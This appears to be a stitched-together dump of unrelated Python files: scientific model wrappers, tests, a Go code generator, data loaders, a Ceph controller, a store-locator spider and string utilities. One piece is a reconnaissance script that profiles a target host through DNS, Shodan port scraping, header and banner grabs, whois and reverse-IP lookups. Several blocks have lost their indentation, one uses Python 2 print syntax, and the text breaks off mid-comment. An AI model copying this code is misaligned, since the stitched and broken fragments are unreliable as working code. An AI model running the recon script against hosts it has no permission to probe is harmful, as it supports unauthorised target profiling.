    msg = "Do not call {cls}'s constructor directly, use .* instead."
    with pytest.raises(TypeError, match=msg.format(cls=klass.__name__)):
        klass()
|
#! /usr/bin/env python
"""
Wrap Savannah River test problem for PCGA
"""
import numpy as np
import setup_savannah
"""
Set the input values for running the problem
"""
# Module-level setup: builds the forward problem, writes its input files and
# pre-computes the quantities the functions below close over
# (prm, H_meas, x_true, x_dummy, t0).
##describe the geometry of the problem
grid_gridgen= "./mesh_files/grid_savannah_river_nx501_ny41" #name of xy gridgen file
rect_gridgen= "./mesh_files/rect_savannah_river_nx501_ny41" #name of rectd gridgen file
##filenames running the forward problems
sim_prefix= "./sim_files/savannah_gridgen_new_nx501_ny41" #basename of adh mesh and files for simulation
##spatial location of observations
#filename for velocity observation locations
velocity_obs_file= "./observation_files/observation_loc_drogue12345_50ft.dat" #drifter locations
#filename for elevation observation location
elevation_obs_file= "./observation_files/observation_loc_none.dat" #empty
##solution and mesh information for the reference solution
true_soln_file_h5='./true_files/savannah_gridgen_true_nx501_ny41_p0.h5'
true_soln_meshbase= './true_files/savannah_gridgen_true_nx501_ny41'
##instantiate the class that describes the forward problem geometry, boundary conditions, initial conditions
#inflow discharge and free surface elevation at the boundary
Q_b = 6873.5; z_f=97.14
forward_prob = setup_savannah.SavannahRiver(grid_file=grid_gridgen,rect_file=rect_gridgen,
                                            initial_free_surface_elevation=z_f)
##write out the base mesh, input file, and initial condition file
forward_prob.writeMesh(sim_prefix)
forward_prob.writeBCFile(sim_prefix)
forward_prob.writeHotFile(sim_prefix)
##get the measurement locations
velocity_obs_loc = np.loadtxt(velocity_obs_file)
elev_obs_loc = np.loadtxt(elevation_obs_file)
##instantiate the inverse problem which controls the forward model simulation
prm = setup_savannah.SavannahRiverProblem(forward_prob.mesh,
                                          forward_prob,
                                          velocity_obs_loc,
                                          elev_obs_loc,
                                          sim_prefix=sim_prefix,
                                          debug_rigid_lid=False,
                                          pre_adh_path='../bin/pre_adh',
                                          adh_path='../bin/adh',
                                          true_soln_file_h5=true_soln_file_h5,
                                          true_soln_meshbase= true_soln_meshbase,
                                          Q_b=Q_b,
                                          z_f=z_f)
##go ahead and evaluate once
t0 = 0.
#true solution
x_true = prm.get_true_solution(t0)
#measurement matrix
H_meas = prm.get_measurement_matrix(t0)
# scratch state vector reused by run_forward_model (mutated in place)
x_dummy = x_true.copy()
def get_measurements():
    """
    Returns actual measurements for the problem and the degree of freedom indices
    Here we are using synthetic measurements
    """
    return prm.get_measurement(H_meas, x_true, t0)
def run_forward_model(z_in):
    """
    Run forward model and return approximate measured values

    z_in: bathymetry values for the first prm.nn degrees of freedom.
    NOTE(review): mutates the module-level x_dummy buffer in place, so this is
    not safe to call concurrently.
    """
    x_dummy[:prm.nn]=z_in
    x_dummy[prm.nn:]=prm.compute_velocity(z_in,t0)
    x_meas = H_meas.dot(x_dummy)
    return x_meas
if __name__ == "__main__":
import os
##write out indices so that we can compare with setup_savannah
fortran_base= 1
obs_dir = os.path.dirname(velocity_obs_file)
pdaf_obs_file = os.path.join(obs_dir,'pcga_pdaf_observations.dat')
pdaf_obsind_file = os.path.join(obs_dir,'pcga_pdaf_observations_indices.dat')
obs = get_measurements()
obs_indices = H_meas.indices.copy()
obs_indices += fortran_base
assert obs.shape[0] == prm.nrobs
header='{0:d}'.format(prm.nrobs)
np.savetxt(pdaf_obs_file,obs,header=header,comments='')
assert obs_indices.shape[0] == prm.nrobs
np.savetxt(pdaf_obsind_file,obs_indices,header=header,comments='',fmt='%d')
##now run the forward model with the true bathymetry, calculate the measurements and compare the difference
x_meas = run_forward_model(x_true[:prm.nn])
diff = x_meas - obs
print "max difference between true and calcuated observations = {0:5.5e}".format(np.max(np.absolute(diff)))
|
from project.animals.animal import Animal
from abc import ABC, abstractmethod
class Bird(Animal, ABC):
    """Abstract base for birds: adds wing size on top of the Animal state."""
    @abstractmethod
    def __init__(self, name: str, weight: float, wing_size: float, food_eaten=0):
        # name/weight/food_eaten are assumed to be stored by Animal.__init__
        # — confirm in project.animals.animal.
        super().__init__(name, weight, food_eaten)
        self.wing_size = wing_size
    def __repr__(self):
        """Concrete class name followed by [name, wing_size, weight, food_eaten]."""
        return f"{self.__class__.__name__} [{self.name}, {self.wing_size}, {self.weight}, {self.food_eaten}]"
class Owl(Bird):
    """A bird that eats only meat and gains weight at a rate of 0.25."""

    def __init__(self, name: str, weight: float, wing_size: float):
        super().__init__(name, weight, wing_size)

    @property
    def allowed_foods(self):
        """Food type names this animal accepts."""
        return ["Meat"]

    @property
    def weight_gain(self):
        """Weight-gain factor applied when the owl is fed."""
        return 0.25

    @staticmethod
    def make_sound():
        return "Hoot Hoot"
class Hen(Bird):
    """An omnivorous bird that gains weight at a rate of 0.35."""

    def __init__(self, name: str, weight: float, wing_size: float):
        super().__init__(name, weight, wing_size)

    @property
    def allowed_foods(self):
        """Food type names this animal accepts."""
        return ["Vegetable", "Fruit", "Meat", "Seed"]

    @property
    def weight_gain(self):
        """Weight-gain factor applied when the hen is fed."""
        return 0.35

    @staticmethod
    def make_sound():
        return "Cluck"
|
import os
class TestCli(object):
    """Helper for asserting on the stdout of shell commands."""

    def run_cmd(self, cmd):
        """Execute *cmd* through the shell and return the open pipe (file-like)."""
        return os.popen(cmd)

    def equal(self, cmd, expect):
        """Run *cmd* and assert that *expect* occurs somewhere in its output."""
        output = self.run_cmd(cmd).read()
        assert output.find(expect) >= 0
|
from src.models import Company, Portfolio
class TestCompanyModel:
    """Test new company item."""
    # The `company` fixture is assumed to create a Company row with
    # name='Google', symbol='goog' and a parent portfolio — see conftest.
    def test_create_company(self, company):
        """New company row is added to Company table."""
        assert company.id > 0
    def test_company_name(self, company):
        """New company name added successfully."""
        assert company.name == 'Google'
    def test_company_symbol(self, company):
        """New company symbol symbol added successfully"""
        assert company.symbol == 'goog'
    def test_company_portfolio_id(self, company):
        """New company has associated portfolio"""
        assert company.portfolio_id > 0
class TestPortfolioModel:
    """Test new portfolio item."""
    def test_create_portfolio(self, portfolio):
        """New portfolio row gets a primary key."""
        assert portfolio.id > 0
    def test_portfolio_name(self, portfolio):
        """New portfolio uses the default name."""
        assert portfolio.name == 'Default'
    def test_portfolio_user_id(self, portfolio):
        # NOTE(review): despite the name, this only checks the row count —
        # it never inspects portfolio.user_id; consider asserting on it.
        portfolios = Portfolio.query.all()
        assert len(portfolios) == 1
class TestUserModel:
    """Test new user records."""
    def test_user_create(self, user):
        """Test that a new user is added to the database on registration"""
        assert user.id > 0
    def test_user_email(self, user):
        """Test that a user's email is added."""
        assert user.email == 'test@test.com'
    def test_user_check_password(self, user):
        """Test that a user's password is added."""
        # Imported here to avoid a circular import at module load time.
        from src.models import User
        assert User.check_password_hash(user, 'password')
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Code by imanSHA256
import nmap
import requests as re
from bs4 import BeautifulSoup
import socket
import bs4
import sys
default = "\033[0m"
white = '\033[97m'
green = '\033[1;32m'
red = '\033[1;31m'
yellow = '\033[1;33m'
magneta = "\033[35m"
cyan = "\033[36m"
lgray = "\033[37m"
dgray = "\033[90m"
lred = "\033[91m"
lgreen = "\033[92m"
lyellow = "\033[93m"
lblue = "\033[94m"
lmagneta = "\033[95m"
lcyan = "\033[96m"
str_sprt="%s -------------------------------------------------------"
url=sys.argv[1]
description=yellow+"""
_____ _____ ___ _____ _____ _____ _____ _____
| __| | | | |_ _| | | | __| __ |
|__ | | | |_ | | | | --| | __| -|
|_____|_|___| |_| |_| |_____|__|__|_____|__|__|
"""+lblue+"https://github.com/imanSHA256"
print(description)
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
'Host': 'www.shodan.io'
}
#DNS loockup for hostname
socket_ip=socket.gethostbyname(url)
print(str_sprt % lmagneta )
print('%s Host: ' % lcyan + lyellow + socket_ip )
print(str_sprt % lmagneta )
#header info for hostname
header_data=re.get("https://api.hackertarget.com/httpheaders/?q="+url)
print("%s HTTP Header : " % lcyan + url + " : \n")
print('%s ' % red + header_data.text )
print(str_sprt % lmagneta )
#ports by shodan
shodan_url="https://www.shodan.io/host/"+socket_ip
shodan_content=re.get(shodan_url,headers=headers)
soup=BeautifulSoup(shodan_content.text, 'lxml')
ul=soup.find("ul", class_="ports")
ports=[]
for a in ul.findAll('a', href=True):
ports.append(a['href'].replace('#',''))
str_ports='%s ' + str(ports).replace('[','').replace(']','').replace(',','').replace('\'','')
print("%s Ports:" % cyan + str_ports % lred)
print(str_sprt % lmagneta )
#whois info for hostname
whois_data=re.get("https://api.hackertarget.com/whois/?q="+url)
print("%s whois lookup result for " % lcyan + url + " : \n")
print('%s ' % yellow + whois_data.text )
print(str_sprt % lmagneta )
#banner lookup
banners=re.get("https://api.hackertarget.com/bannerlookup/?q="+socket_ip)
print("%s banner lookup result for " % lcyan +socket_ip + " : \n")
print('%s ' % lgreen + banners.text + "\n" )
print(str_sprt % lmagneta )
#Reverse ip loock up
Domains=re.get("https://api.hackertarget.com/reverseiplookup/?q="+socket_ip)
print("%s reverse ip loockup result for " % lcyan +socket_ip + " : \n")
if "No DNS A records found" in Domains.text:
print('%s ' % default + "No DNS A records found \n")
else:
domains_list = str(Domains.text).split()
for i in domains_list:
print('%s ' % default + "www." + i )
|
from stone.ir import (ApiNamespace, ApiRoute)
from stone.ir import (
Boolean,
Float32,
Float64,
Int32,
Int64,
String,
Timestamp,
UInt32,
UInt64,
unwrap_nullable,
is_composite_type,
is_list_type,
is_struct_type,
Void,
)
from stone.backends import helpers
HEADER = """\
// Copyright (c) Dropbox, Inc.
//
// Permission is hereby granted, free of charge, to any person obtaining a copy
// of this software and associated documentation files (the "Software"), to deal
// in the Software without restriction, including without limitation the rights
// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
// copies of the Software, and to permit persons to whom the Software is
// furnished to do so, subject to the following conditions:
//
// The above copyright notice and this permission notice shall be included in
// all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
// OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
// THE SOFTWARE.
"""
# Go's 25 reserved keywords — generated identifiers must never collide with these.
_reserved_keywords = {
    'break', 'default', 'func', 'interface', 'select',
    'case', 'defer', 'go', 'map', 'struct',
    'chan', 'else', 'goto', 'package', 'switch',
    'const', 'fallthrough', 'if', 'range', 'type',
    'continue', 'for', 'import', 'return', 'var',
}

# Mapping from stone primitive types to their Go spellings.
_type_table = {
    UInt64: 'uint64',
    Int64: 'int64',
    UInt32: 'uint32',
    Int32: 'int32',
    Float64: 'float64',
    Float32: 'float32',
    Boolean: 'bool',
    String: 'string',
    Timestamp: 'time.Time',
    Void: 'struct{}',
}


def _rename_if_reserved(s):
    """Append an underscore when *s* collides with a Go reserved keyword."""
    return s + '_' if s in _reserved_keywords else s
def fmt_type(data_type, namespace=None, use_interface=False, raw=False):
    """Render a stone data type as a Go type expression.

    :param data_type: the stone IR type (possibly nullable-wrapped)
    :param namespace: namespace the generated code lives in; composite types
        from a different namespace are qualified with their package name
    :param use_interface: emit the `IsX` interface name for polymorphic structs
    :param raw: emit json.RawMessage so decoding can be deferred
    """
    data_type, nullable = unwrap_nullable(data_type)
    if is_list_type(data_type):
        # Lists of non-polymorphic elements can be captured raw as a whole.
        if raw and not _needs_base_type(data_type.data_type):
            return "json.RawMessage"
        return '[]%s' % fmt_type(data_type.data_type, namespace, use_interface, raw)
    if raw:
        return "json.RawMessage"
    type_name = data_type.name
    if use_interface and _needs_base_type(data_type):
        type_name = 'Is' + type_name
    if is_composite_type(data_type) and namespace is not None and \
            namespace.name != data_type.namespace.name:
        # Cross-namespace reference: qualify with the defining package.
        type_name = data_type.namespace.name + '.' + type_name
    if use_interface and _needs_base_type(data_type):
        return _type_table.get(data_type.__class__, type_name)
    else:
        # Composite types are passed by pointer; primitives by value.
        if data_type.__class__ not in _type_table:
            return '*' + type_name
        if data_type.__class__ == Timestamp:
            # For other primitive types, `omitempty` does the job.
            return ('*' if nullable else '') + _type_table[data_type.__class__]
        return _type_table[data_type.__class__]
def fmt_var(name, export=True, check_reserved=False):
    """Format *name* as a Go identifier: PascalCase when exported, camelCase otherwise."""
    formatted = helpers.fmt_pascal(name) if export else helpers.fmt_camel(name)
    if check_reserved:
        return _rename_if_reserved(formatted)
    return formatted
def _doc_handler(tag, val):
if tag == 'type':
return '`{}`'.format(val)
elif tag == 'route':
return '`{}`'.format(helpers.fmt_camel(val))
elif tag == 'link':
anchor, link = val.rsplit(' ', 1)
return '`{}` <{}>'.format(anchor, link)
elif tag == 'val':
if val == 'null':
return 'nil'
else:
return val
elif tag == 'field':
return '`{}`'.format(val)
else:
raise RuntimeError('Unknown doc ref tag %r' % tag)
def generate_doc(code_generator, t):
    """Emit a `// ...` doc comment for the stone entity *t*.

    Namespaces get a `Package x : ...` form; deprecated routes additionally get
    a `Deprecated:` line naming the replacement route when one exists.
    """
    doc = t.doc
    if doc is None:
        doc = 'has no documentation (yet)'
    doc = code_generator.process_doc(doc, _doc_handler)
    d = '%s : %s' % (fmt_var(t.name), doc)
    if isinstance(t, ApiNamespace):
        d = 'Package %s : %s' % (t.name, doc)
    code_generator.emit_wrapped_text(d, prefix='// ')
    # Generate comment for deprecated routes
    if isinstance(t, ApiRoute):
        if t.deprecated is not None:
            d = 'Deprecated: '
            if t.deprecated.by is not None:
                deprecated_by = t.deprecated.by
                fn = fmt_var(deprecated_by.name)
                if deprecated_by.version != 1:
                    # Versioned routes get a V<N> suffix in the generated SDK.
                    fn += 'V%d' % deprecated_by.version
                d += 'Use `%s` instead' % fn
            code_generator.emit_wrapped_text(d, prefix='// ')
def _needs_base_type(data_type):
    """True when *data_type* requires a generated Go base type.

    That is the case for structs with enumerated subtypes (polymorphic), and
    recursively for lists whose element type needs one.
    """
    if is_struct_type(data_type) and data_type.has_enumerated_subtypes():
        return True
    if is_list_type(data_type):
        return _needs_base_type(data_type.data_type)
    return False
def needs_base_type(struct):
    """True when any field of *struct* requires a generated Go base type."""
    return any(_needs_base_type(field.data_type) for field in struct.fields)
|
import collections
from typing import Collection, Container
import pandas as pd
import os
# US region groupings by two-letter state code (roughly Census regions).
# NOTE(review): 'DE' and 'MD' appear in both NORTH_EAST and SOUTH — likely
# unintended double-counting; confirm which regional scheme is intended.
NORTH_EAST = ['CT', 'DE', 'MA', 'MD', 'ME', 'NH', 'NJ', 'NY', 'PA', 'RI', 'VT']
MID_WEST = ['IA', 'IL', 'IN', 'KS', 'MI', 'MN', 'MO', 'ND', 'NE', 'OH', 'SD', 'WI']
WEST = ['AK', 'AZ', 'CA', 'CO', 'HI', 'ID', 'MT', 'NM', 'NV', 'OR', 'UT', 'WA', 'WY']
SOUTH = ['AL', 'AR', 'DC', 'DE', 'FL', 'GA', 'KY', 'LA', 'MD', 'MS', 'NC', 'OK', 'SC', 'TN', 'TX', 'VA', 'WV']
def load_and_process_one(source: str):
    """Read the single CSV file at *source* and return the processed DataFrame.

    Raises FileExistsError when the path is missing and FileNotFoundError when
    it points at a directory (mirroring the original validation behaviour).
    """
    if not os.path.exists(source):
        raise FileExistsError("Path does not exist.")
    if os.path.isdir(source):
        raise FileNotFoundError("Expected file path.")
    frame = pd.read_csv(source, delimiter=',')
    return process(frame)
def load_and_process_many(source: str):
    """Read every ``.csv`` file in directory *source*, concatenate them and
    return the processed result.

    Raises FileExistsError when the path is missing and TypeError when it is
    not a directory.
    """
    if not os.path.exists(source):
        raise FileExistsError("Path does not exist.")
    if not os.path.isdir(source):
        raise TypeError("Expected directory path.")
    frames = [
        pd.read_csv(os.path.join(source, name), delimiter=",")
        for name in os.listdir(source)
        if name.endswith(".csv")
    ]
    combined = pd.concat(frames, axis=0, ignore_index=True)
    return process(combined)
def process(dataframe: pd.DataFrame):
    """Clean a raw names DataFrame.

    Drops the Id column, rows with missing values, and duplicate
    (Name, Year, Gender[, State]) rows; keeps only years >= 1910 and resets
    the index.

    The year filter uses a callable so the boolean mask is computed against
    the frame *after* the preceding drops. The old form,
    ``.loc[dataframe["Year"] >= 1910]``, built the mask from the original
    frame and raised an unalignable-boolean-indexer error once dropna() or
    drop_duplicates() had removed rows.
    """
    subset = ["Name", "Year", "Gender"]
    if "State" in dataframe.columns:
        subset.append("State")
    return (
        dataframe
        .drop(columns=['Id'])
        .dropna()
        .drop_duplicates(subset=subset, keep='first')
        .loc[lambda frame: frame["Year"] >= 1910]
        .reset_index(drop=True)
    )
def export_processed_data(data_dict: dict, buffer=os.getcwd(), remove=True):
    """Write every DataFrame in *data_dict* to ``<buffer>/<name>.csv``.

    :param data_dict: mapping of base file name -> DataFrame
    :param buffer: target directory (note: the default is the working
        directory captured at import time, a pre-existing quirk kept for
        compatibility)
    :param remove: when True (default), delete every existing ``.csv`` in
        *buffer* before exporting — this overwrites prior exports

    Fix: the removed-files list is now accumulated across the whole sweep and
    reported once. The old code re-created the list inside the loop, so the
    "files have been removed" report never showed more than one file.
    """
    if not os.path.exists(buffer):
        raise FileExistsError("Path does not exists")
    elif not os.path.isdir(buffer):
        raise TypeError("Expected directory path.")
    # Warning: this method will overwrite all existing csv in buffer by default
    if remove:
        removed = []
        for file in os.listdir(buffer):
            if file.endswith(".csv"):
                csv = os.path.join(buffer, file)
                os.remove(csv)
                removed.append(csv)
        print("{0}\nThe following csv files have been removed:\n{1}\n{0}".format("="*50, removed))
    for name, data in data_dict.items():
        name = name + ".csv"
        data.to_csv(os.path.join(buffer, name), index=True)
        print(f"=> Exported {name} to {os.path.abspath(buffer)}")
|
# Инициализируем переменную целочисленным значением
# Initialise the variable with an integer value
var = 8
print(var)
# Assign a floating-point value to the variable
var = 3.142
print(var)
# Assign a string value to the variable
var = 'Python in easy steps'
print(var)
# Assign a boolean value to the variable
var = True
print(var) |
# Alain Dechorgnat
# 05/19/2014
from flask import Flask, request, Response
import json
import requests
import re
from array import *
import sys
sys.path.append("..")
from sfcsmUtil.operate import Operate
class Monitors:
    """Marker/data class for Ceph monitors (currently empty; the previous
    docstring said "Osds", which was a copy-paste from another module)."""
    def __init__(self):
        pass
class MonitorsCtrl:
    """Controller exposing Ceph monitor information through the ceph-rest-api."""

    def __init__(self, conf):
        """Build the base REST URL from the configuration dict.

        :param conf: dict with keys ``cluster``, ``ceph_rest_api``
            (``host:port``) and optionally ``ceph_rest_api_subfolder``.
        """
        self.cluster_name = conf['cluster']
        ceph_rest_api_subfolder = conf.get("ceph_rest_api_subfolder", "")
        ceph_rest_api_subfolder = ceph_rest_api_subfolder.strip('/')
        if ceph_rest_api_subfolder != '':
            ceph_rest_api_subfolder = "/" + ceph_rest_api_subfolder
        self.cephRestApiUrl = "http://" + conf.get("ceph_rest_api", "") + ceph_rest_api_subfolder + "/api/v0.1/"

    def getCephRestApiUrl(self):
        """Return the base URL of the ceph-rest-api endpoint."""
        return self.cephRestApiUrl

    def monsList(self):
        """Return a JSON Response listing each monitor (name, rank, addr, health)."""
        cephRestApiUrl = self.getCephRestApiUrl()
        stats = requests.get(cephRestApiUrl + 'status.json')
        if stats.status_code != 200:
            return Response(stats.raise_for_status())
        stats = json.loads(stats.content)['output']
        monmap = stats['monmap']['mons']
        monHealth = stats['health']['health']['health_services'][0]['mons']
        mons = []
        for m in monmap:
            mon = {}
            mon['name'] = m['name']
            mon['rank'] = m['rank']
            # Extract the bare IPv4 address from strings such as "1.2.3.4:6789/0"
            reip = re.compile(r'(?<![\.\d])(?:\d{1,3}\.){3}\d{1,3}(?![\.\d])')
            mon['addr'] = reip.findall(m['addr'])[0]
            for i in monHealth:
                if m['name'] == i['name']:
                    mon['health'] = i['health']
                    # dict.has_key() was removed in Python 3; `in` works in both 2 and 3
                    if 'health_detail' in i:
                        mon['health_detail'] = i['health_detail']
            mons.append(mon)
        return Response(json.dumps(mons), mimetype='application/json')
|
from config import ElasticsearchConfig
import opensearchpy
import hashlib
import json
from storage import ElasticsearchStorage
class TestElasticsearchStorage:
    """Integration tests for ElasticsearchStorage against a live OpenSearch
    instance (connection settings come from the environment)."""
    def setup(self):
        # Fresh client, store and a dedicated throwaway index per test.
        config = ElasticsearchConfig.create_from_env()
        self._es_client = opensearchpy.OpenSearch(config.host)
        self._es_store = ElasticsearchStorage(self._es_client)
        self._index = "testindex"
    def teardown(self):
        # ignore 400/404 so teardown is safe even when the index was never created
        self._es_client.indices.delete(index=self._index, ignore=[400, 404])
        self._es_store = None
        self._es_client = None
    def test_store_changes(self):
        """Re-storing an unchanged document set must not create new documents."""
        d = {"foo": "bar"}
        docs = [d]
        self._es_store.store_changes(
            index=self._index,
            documents=docs,
            id_fn=get_doc_id)
        d = {"foobar": "barfoo"}
        docs.append(d)
        self._es_store.store_changes(
            index=self._index,
            documents=docs,
            id_fn=get_doc_id)
        # make sure the value is visible in the index
        self._es_client.indices.refresh(index=self._index)
        all_docs = self._es_client.search(index=self._index)
        assert len(all_docs["hits"]["hits"]) == 2
        # Insert again the same records, should not store anything new
        # NOTE(review): this re-insert switches id_fn to get_doc_checksum and
        # asserts on the previously fetched `all_docs` without re-searching —
        # the final assert cannot observe the second insert; confirm intent.
        self._es_store.store_changes(
            index=self._index,
            documents=docs,
            id_fn=get_doc_checksum)
        assert len(all_docs["hits"]["hits"]) == 2
    def test_store_changes_with_id_fn(self):
        """Documents differing only in "timestamp" share a checksum id, so only
        one document ends up stored."""
        docs = [{
            "foo": "bar",
        }]
        self._es_store.store_changes(
            index=self._index,
            documents=docs,
            id_fn=get_doc_checksum)
        docs.append({"foo": "bar", "timestamp": "2021-03-01T00:00:00.000Z"})
        self._es_store.store_changes(
            index=self._index,
            documents=docs,
            id_fn=get_doc_checksum)
        # make sure the value is visible in the index
        self._es_client.indices.refresh(index=self._index)
        all_docs = self._es_client.search(index=self._index)
        assert len(all_docs["hits"]["hits"]) == 1
    def test_store_changes_with_transform_document_fn(self):
        """transform_document_fn is applied to documents before indexing."""
        def add_qux(x: dict) -> dict:
            x["qux"] = "foobar"
            return x
        docs = [{
            "foo": "bar",
        }]
        self._es_store.store_changes(
            index=self._index,
            documents=docs,
            id_fn=get_doc_checksum,
            transform_document_fn=add_qux
        )
        # make sure the value is visible in the index
        self._es_client.indices.refresh(index=self._index)
        all_docs = self._es_client.search(index=self._index)
        assert len(all_docs["hits"]["hits"]) == 1
        assert "qux" in all_docs["hits"]["hits"][0]["_source"]
        assert all_docs["hits"]["hits"][0]["_source"]["qux"] == "foobar"
        # still won't add a new document if we try without transform document fn
        self._es_store.store_changes(
            index=self._index,
            documents=docs,
            id_fn=get_doc_checksum
        )
        all_docs = self._es_client.search(index=self._index)
        assert len(all_docs["hits"]["hits"]) == 1
    def test_store_changes_filtered(self):
        """With filter_by, change detection is scoped to the matching documents."""
        filter_by = {"term": {"cluster_id": "da932361-df0a-4bfa-8b4f-599bb2db5135"}}
        docs = [{
            "cluster_id": "da932361-df0a-4bfa-8b4f-599bb2db5135",
            "foo": "bar",
        }]
        self._es_store.store_changes(
            index=self._index,
            documents=docs,
            id_fn=get_doc_checksum,
            filter_by=filter_by
        )
        docs.append({
            "foo": "bar",
            "cluster_id": "da932361-df0a-4bfa-8b4f-599bb2db5135",
            "timestamp": "2021-03-01T00:00:00.000Z"
        })
        self._es_store.store_changes(
            index=self._index,
            documents=docs,
            id_fn=get_doc_checksum,
            filter_by=filter_by
        )
        # make sure the value is visible in the index
        self._es_client.indices.refresh(index=self._index)
        all_docs = self._es_client.search(index=self._index)
        assert len(all_docs["hits"]["hits"]) == 1
def get_doc_id(doc: dict) -> str:
    """Deterministic document id: sha256 hex digest of the JSON serialisation."""
    serialised = json.dumps(doc).encode('utf-8')
    return hashlib.sha256(serialised).hexdigest()
def get_doc_checksum(doc: dict) -> str:
    """Return a stable sha256 checksum of *doc*, ignoring any "timestamp" key.

    Fix: the old code aliased the input (``payload = doc``) and then deleted
    "timestamp" from it, mutating the caller's dict. Build a filtered copy
    instead so the input is left untouched.
    """
    payload = {key: value for key, value in doc.items() if key != "timestamp"}
    return hashlib.sha256(json.dumps(payload, sort_keys=True).encode('utf-8')).hexdigest()
|
import re
import scrapy
import json
from locations.items import GeojsonPointItem
from locations.hours import OpeningHours
# Maps the feed's lowercase weekday names to the two-letter codes OpeningHours expects.
DAY_MAPPING = {
    "monday": "Mo",
    "tuesday": "Tu",
    "wednesday": "We",
    "thursday": "Th",
    "friday": "Fr",
    "saturday": "Sa",
    "sunday": "Su",
}
class VitaliaSpider(scrapy.Spider):
    """Scrapes Vitalia Reformhaus store locations from the embedded JSON on the
    store-finder page."""
    name = "vitalia"
    allowed_domains = ["www.vitalia-reformhaus.de"]
    start_urls = ["https://www.vitalia-reformhaus.de/marktfinder"]
    def parse_hours(self, store_hours):
        """Convert the feed's per-day {from,to} hour/minute dicts into an
        opening-hours string; returns None when no schedule is provided.

        NOTE(review): hour/minute values are interpolated as-is; assumes they
        are already zero-padded (or that "%H:%M" parsing tolerates e.g. "9:5")
        — confirm against real feed data.
        """
        opening_hours = OpeningHours()
        if store_hours is None:
            return
        for store_day in store_hours:
            opening_hours.add_range(
                day=DAY_MAPPING[store_day],
                open_time=f"{store_hours[store_day]['from']['hours']}:"
                f"{store_hours[store_day]['from']['minutes']}",
                close_time=f"{store_hours[store_day]['to']['hours']}:"
                f"{store_hours[store_day]['to']['minutes']}",
                time_format="%H:%M",
            )
        return opening_hours.as_opening_hours()
    def parse(self, response):
        """Extract the jsonLocations blob from the page script and yield one
        GeojsonPointItem per store."""
        match = re.search(r"jsonLocations: (.+),", response.text)
        if match:
            data = match.group(1)
            stores = json.loads(data)
            for store in stores["items"]:
                properties = {
                    "ref": store["id"],
                    "name": store["name"],
                    "street": store["address"],
                    "city": store["city"],
                    "postcode": store["zip"],
                    "country": store["country"],
                    "lat": store["lat"],
                    "lon": store["lng"],
                    "phone": store["phone"],
                    "extras": {
                        "email": store["email"],
                        "website": store["website"],
                        "category": store["category"],
                    },
                }
                # schedule_string is JSON embedded in a JSON string value
                opening_hours = json.loads(store["schedule_string"])
                hours = self.parse_hours(opening_hours)
                if hours:
                    properties["opening_hours"] = hours
                yield GeojsonPointItem(**properties)
|
"""Collection of common functions and other objects used throughout the program."""
import re
from typing import Any, Iterable, Union
def check_attributes(attrs_to_check: list = None, data: dict = None) -> bool:
    """Check whether every attribute in a list is present as a key of a dict.

    :param attrs_to_check: List of attributes or keys to check the dict
    :param data: The dict to check against for keys
    :raises TypeError: if ``attrs_to_check`` is not a list or ``data`` is not a dict
    :return: True if every listed key exists in ``data``, else False.
    """
    if not isinstance(attrs_to_check, list):
        raise TypeError("Invalid data type, must use a list.")
    if not isinstance(data, dict):
        raise TypeError("Invalid data type, must use a dict.")
    # `all` already returns a bool; the original's if/return True/return False
    # was redundant.  The return annotation was also fixed (Union[bool] -> bool).
    return all(key in data for key in attrs_to_check)
def cleanup_args(
    args_dict: dict, items_to_remove: Iterable = ("self", "kwargs", "params")
) -> dict:
    """Return a copy of ``args_dict`` without None values or unwanted keys.

    :raises AttributeError: if ``args_dict`` is empty/falsy
    :raises TypeError: if ``args_dict`` is not a dict
    """
    if not args_dict:
        raise AttributeError("No arguments received.")
    if not isinstance(args_dict, dict):
        raise TypeError("Args must be passed as a dict.")
    cleaned = {}
    for key, value in args_dict.items():
        if value is not None and key not in items_to_remove:
            cleaned[key] = value
    return cleaned
def _unpack(data: Any) -> Any:
"""Unpack a dict."""
if isinstance(data, dict):
return data.items()
return data
def _copy_dict(data: dict) -> dict:
    """Return a shallow copy of a dict."""
    return data.copy()
def to_dict(obj: object) -> dict:
    """Shallow-copy an object's attribute mapping into a plain dict.

    Objects that store their fields under a ``__values__`` entry (pydantic-v0
    style, presumably -- verify against callers) contribute that inner mapping
    instead of the raw ``__dict__``.
    """
    source = obj.__dict__
    if "__values__" in source:
        source = source.get("__values__")
    pairs = source.items() if isinstance(source, dict) else source
    return dict(pairs)
def to_snake_case(value: str) -> str:
    """Convert a camel-case string to snake case."""
    words = re.findall(r"[A-Z]?[a-z]+|[A-Z]{2,}(?=[A-Z][a-z]|\d|\W|$)|\d+", value)
    lowered = [word.lower() for word in words]
    return "_".join(lowered)
def keys_to_snake_case(content: dict) -> dict:
    """Return ``content`` with every key converted to snake case."""
    return {to_snake_case(key): value for key, value in content.items()}
def to_modified_camel(value: str) -> str:
    """Convert the given string to camel case with a leading underscore.

    The original computed ``value.split("_")`` into an unused local variable;
    that dead code has been removed.
    """
    return "_" + to_camel_case(value)
def to_camel_case(value: str) -> str:
    """Convert a snake-case string to camel case."""
    head, *tail = value.split("_")
    capitalized = [word.title() for word in tail if not word.isspace()]
    return head + "".join(capitalized)
def keys_to_camel_case(data: dict) -> dict:
    """Return ``data`` with every key converted to camel case."""
    return {to_camel_case(key): value for key, value in data.items()}
def keys_to_modified_camel(data: dict) -> dict:
    """Return ``data`` with every key converted to underscore-prefixed camel case."""
    return {to_modified_camel(key): value for key, value in data.items()}
def parse_keys(data: dict = None, parse_type: str = "modified_camel") -> dict:
    """Convert all keys of ``data`` to the requested casing.

    :param data: The dict to parse
    :param parse_type: One of ``modified_camel``, ``camel_case`` or ``snake_case``.
    :raises ValueError: for an unknown ``parse_type``
    :raises TypeError: if ``data`` is not a dict
    """
    # Explicit dispatch table.  The original picked the formatter by testing
